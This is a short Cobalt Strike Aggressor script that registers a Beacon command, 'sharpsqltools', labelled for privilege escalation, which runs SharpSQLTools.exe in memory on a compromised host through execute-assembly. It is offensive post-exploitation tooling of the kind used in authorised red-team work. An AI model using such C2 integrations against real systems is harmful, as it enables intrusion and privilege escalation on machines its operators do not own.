beacon_command_register("sharpsqltools", "Privilege Escalation Checks",
	"Usage: sharpsqltools [arguments]\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpsqltools{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$desc = "sharpsqltools";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, script_resource("exe/SharpSQLTools.exe"), $argu);
}
